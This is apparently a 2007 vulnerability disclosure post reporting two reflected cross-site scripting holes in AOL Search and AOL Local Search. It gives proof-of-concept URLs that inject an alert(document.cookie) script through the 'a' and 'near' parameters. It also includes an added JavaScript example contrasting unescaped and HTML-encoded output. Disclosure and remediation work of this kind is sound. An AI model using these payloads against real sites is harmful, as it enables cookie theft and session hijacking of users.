MOSEB-22 Bonus: Vulnerabilities in AOL Search

22:58 23.06.2007

New bonus vulnerabilities in AOL Search. In this case the vulnerabilities are at other domains than in MOSEB-22: Vulnerability at search.aol.com.

The vulnerabilities are in AOL Search (aolsearch.aol.com, which is another version of AOL Search) and in AOL Local Search (http://local.aol.com). I found the first one on 05.06.2007; it is a Cross-Site Scripting hole.

XSS:

The vulnerability is in the a parameter:
http://aolsearch.aol.com/aol/recent?invocationType=recentSearchMaint&a=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

The second one, which Yorn sent me on 19.06.2007, is also a Cross-Site Scripting hole.

XSS:

The vulnerability is in the near parameter:
http://local.aol.com/aol/localaddress?choice=results&near=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
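
Both URLs above start the parameter value with "> which closes a quoted attribute before the script tag. The following is an added example, not code from the original post or from AOL: it assumes (the page does not show the markup) that the value is reflected into a quoted HTML attribute, and puts the unescaped template next to one that HTML-encodes the value. The template and all function names are hypothetical.

```javascript
// Added example. The two URLs are the ones given on the page; the <input>
// template is an assumption about how the value is reflected.
const POC_URLS = [
  { param: "a", url: "http://aolsearch.aol.com/aol/recent?invocationType=recentSearchMaint&a=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E" },
  { param: "near", url: "http://local.aol.com/aol/localaddress?choice=results&near=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E" },
];

// Characters that are significant in HTML text and in quoted attribute values.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The value as the server sees it after URL-decoding the query string.
function paramFromUrl(url, name) {
  return new URL(url).searchParams.get(name) ?? "";
}

// Hypothetical vulnerable template: the raw value lands inside value="...".
function renderUnsafe(name, value) {
  return `<input type="text" name="${name}" value="${value}">`;
}

// Hardened template: the value is encoded for the attribute context, so the
// quote and angle brackets can no longer end the attribute or open a tag.
function renderSafe(name, value) {
  return `<input type="text" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`;
}

// Regression check: does the rendered markup contain a live script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Render each reflected value both ways and report the result.
function checkAll() {
  return POC_URLS.map(({ param, url }) => {
    const value = paramFromUrl(url, param);
    return {
      param,
      unsafeHasScript: containsScriptTag(renderUnsafe(param, value)),
      safeHasScript: containsScriptTag(renderSafe(param, value)),
    };
  });
}

console.log(checkAll());
```

The same encoding has to be applied at every place the parameter is written into the page, not only in the search box.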

Moral: recent search history and local search can be dangerous.

Note that the AOL engine uses the Google search engine, so Google is also responsible for these vulnerabilities (as for their own MOSEB-15, MOSEB-15 Bonus and MOSEB-20 Bonus).

